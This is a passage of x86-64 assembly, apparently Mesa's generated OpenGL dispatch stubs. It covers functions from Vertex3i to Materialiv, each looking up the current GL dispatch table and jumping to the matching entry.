jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1104(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex3i), .-GL_PREFIX(Vertex3i)
.p2align 4,,15
.globl GL_PREFIX(Vertex3iv)
.type GL_PREFIX(Vertex3iv), @function
GL_PREFIX(Vertex3iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1112(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1112(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1112(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1112(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex3iv), .-GL_PREFIX(Vertex3iv)
.p2align 4,,15
.globl GL_PREFIX(Vertex3s)
.type GL_PREFIX(Vertex3s), @function
GL_PREFIX(Vertex3s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1120(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1120(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1120(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1120(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex3s), .-GL_PREFIX(Vertex3s)
.p2align 4,,15
.globl GL_PREFIX(Vertex3sv)
.type GL_PREFIX(Vertex3sv), @function
GL_PREFIX(Vertex3sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1128(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1128(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1128(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1128(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex3sv), .-GL_PREFIX(Vertex3sv)
.p2align 4,,15
.globl GL_PREFIX(Vertex4d)
.type GL_PREFIX(Vertex4d), @function
GL_PREFIX(Vertex4d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1136(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 1136(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1136(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 1136(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex4d), .-GL_PREFIX(Vertex4d)
.p2align 4,,15
.globl GL_PREFIX(Vertex4dv)
.type GL_PREFIX(Vertex4dv), @function
GL_PREFIX(Vertex4dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1144(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1144(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1144(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1144(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex4dv), .-GL_PREFIX(Vertex4dv)
.p2align 4,,15
.globl GL_PREFIX(Vertex4f)
.type GL_PREFIX(Vertex4f), @function
GL_PREFIX(Vertex4f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1152(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 1152(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1152(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 1152(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex4f), .-GL_PREFIX(Vertex4f)
.p2align 4,,15
.globl GL_PREFIX(Vertex4fv)
.type GL_PREFIX(Vertex4fv), @function
GL_PREFIX(Vertex4fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1160(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1160(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1160(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1160(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex4fv), .-GL_PREFIX(Vertex4fv)
.p2align 4,,15
.globl GL_PREFIX(Vertex4i)
.type GL_PREFIX(Vertex4i), @function
GL_PREFIX(Vertex4i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1168(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1168(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1168(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1168(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex4i), .-GL_PREFIX(Vertex4i)
.p2align 4,,15
.globl GL_PREFIX(Vertex4iv)
.type GL_PREFIX(Vertex4iv), @function
GL_PREFIX(Vertex4iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1176(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1176(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1176(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1176(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex4iv), .-GL_PREFIX(Vertex4iv)
.p2align 4,,15
.globl GL_PREFIX(Vertex4s)
.type GL_PREFIX(Vertex4s), @function
GL_PREFIX(Vertex4s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1184(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1184(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1184(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1184(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex4s), .-GL_PREFIX(Vertex4s)
.p2align 4,,15
.globl GL_PREFIX(Vertex4sv)
.type GL_PREFIX(Vertex4sv), @function
GL_PREFIX(Vertex4sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1192(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1192(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1192(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1192(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex4sv), .-GL_PREFIX(Vertex4sv)
.p2align 4,,15
.globl GL_PREFIX(ClipPlane)
.type GL_PREFIX(ClipPlane), @function
GL_PREFIX(ClipPlane):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1200(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1200(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1200(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1200(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ClipPlane), .-GL_PREFIX(ClipPlane)
.p2align 4,,15
.globl GL_PREFIX(ColorMaterial)
.type GL_PREFIX(ColorMaterial), @function
GL_PREFIX(ColorMaterial):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1208(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1208(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1208(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1208(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorMaterial), .-GL_PREFIX(ColorMaterial)
.p2align 4,,15
.globl GL_PREFIX(CullFace)
.type GL_PREFIX(CullFace), @function
GL_PREFIX(CullFace):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1216(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1216(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1216(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1216(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CullFace), .-GL_PREFIX(CullFace)
.p2align 4,,15
.globl GL_PREFIX(Fogf)
.type GL_PREFIX(Fogf), @function
GL_PREFIX(Fogf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1224(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1224(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1224(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1224(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Fogf), .-GL_PREFIX(Fogf)
.p2align 4,,15
.globl GL_PREFIX(Fogfv)
.type GL_PREFIX(Fogfv), @function
GL_PREFIX(Fogfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1232(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1232(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1232(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1232(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Fogfv), .-GL_PREFIX(Fogfv)
.p2align 4,,15
.globl GL_PREFIX(Fogi)
.type GL_PREFIX(Fogi), @function
GL_PREFIX(Fogi):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1240(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1240(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1240(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1240(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Fogi), .-GL_PREFIX(Fogi)
.p2align 4,,15
.globl GL_PREFIX(Fogiv)
.type GL_PREFIX(Fogiv), @function
GL_PREFIX(Fogiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1248(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1248(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1248(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1248(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Fogiv), .-GL_PREFIX(Fogiv)
.p2align 4,,15
.globl GL_PREFIX(FrontFace)
.type GL_PREFIX(FrontFace), @function
GL_PREFIX(FrontFace):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1256(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1256(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1256(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1256(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FrontFace), .-GL_PREFIX(FrontFace)
.p2align 4,,15
.globl GL_PREFIX(Hint)
.type GL_PREFIX(Hint), @function
GL_PREFIX(Hint):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1264(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1264(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1264(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1264(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Hint), .-GL_PREFIX(Hint)
.p2align 4,,15
.globl GL_PREFIX(Lightf)
.type GL_PREFIX(Lightf), @function
GL_PREFIX(Lightf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1272(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1272(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1272(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1272(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Lightf), .-GL_PREFIX(Lightf)
.p2align 4,,15
.globl GL_PREFIX(Lightfv)
.type GL_PREFIX(Lightfv), @function
GL_PREFIX(Lightfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1280(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1280(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1280(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1280(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Lightfv), .-GL_PREFIX(Lightfv)
.p2align 4,,15
.globl GL_PREFIX(Lighti)
.type GL_PREFIX(Lighti), @function
GL_PREFIX(Lighti):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1288(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1288(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1288(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1288(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Lighti), .-GL_PREFIX(Lighti)
.p2align 4,,15
.globl GL_PREFIX(Lightiv)
.type GL_PREFIX(Lightiv), @function
GL_PREFIX(Lightiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1296(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1296(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1296(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1296(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Lightiv), .-GL_PREFIX(Lightiv)
.p2align 4,,15
.globl GL_PREFIX(LightModelf)
.type GL_PREFIX(LightModelf), @function
GL_PREFIX(LightModelf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1304(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1304(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1304(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1304(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LightModelf), .-GL_PREFIX(LightModelf)
.p2align 4,,15
.globl GL_PREFIX(LightModelfv)
.type GL_PREFIX(LightModelfv), @function
GL_PREFIX(LightModelfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1312(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1312(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1312(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1312(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LightModelfv), .-GL_PREFIX(LightModelfv)
.p2align 4,,15
.globl GL_PREFIX(LightModeli)
.type GL_PREFIX(LightModeli), @function
GL_PREFIX(LightModeli):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1320(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1320(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1320(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1320(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LightModeli), .-GL_PREFIX(LightModeli)
.p2align 4,,15
.globl GL_PREFIX(LightModeliv)
.type GL_PREFIX(LightModeliv), @function
GL_PREFIX(LightModeliv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1328(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1328(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1328(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1328(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LightModeliv), .-GL_PREFIX(LightModeliv)
.p2align 4,,15
.globl GL_PREFIX(LineStipple)
.type GL_PREFIX(LineStipple), @function
GL_PREFIX(LineStipple):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1336(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1336(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1336(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1336(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LineStipple), .-GL_PREFIX(LineStipple)
.p2align 4,,15
.globl GL_PREFIX(LineWidth)
.type GL_PREFIX(LineWidth), @function
GL_PREFIX(LineWidth):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1344(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 1344(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1344(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 1344(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LineWidth), .-GL_PREFIX(LineWidth)
.p2align 4,,15
.globl GL_PREFIX(Materialf)
.type GL_PREFIX(Materialf), @function
GL_PREFIX(Materialf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1352(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1352(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1352(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $24, %rsp
movq 1352(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Materialf), .-GL_PREFIX(Materialf)
.p2align 4,,15
.globl GL_PREFIX(Materialfv)
.type GL_PREFIX(Materialfv), @function
GL_PREFIX(Materialfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1360(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1360(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1360(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1360(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Materialfv), .-GL_PREFIX(Materialfv)
.p2align 4,,15
.globl GL_PREFIX(Materiali)
.type GL_PREFIX(Materiali), @function
GL_PREFIX(Materiali):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1368(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1368(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1368(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1368(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Materiali), .-GL_PREFIX(Materiali)
.p2align 4,,15
.globl GL_PREFIX(Materialiv)
.type GL_PREFIX(Materialiv), @function
GL_PREFIX(Materialiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1376(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1376(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1376(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1376(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Materialiv), .-GL_PREFIX(Materialiv)
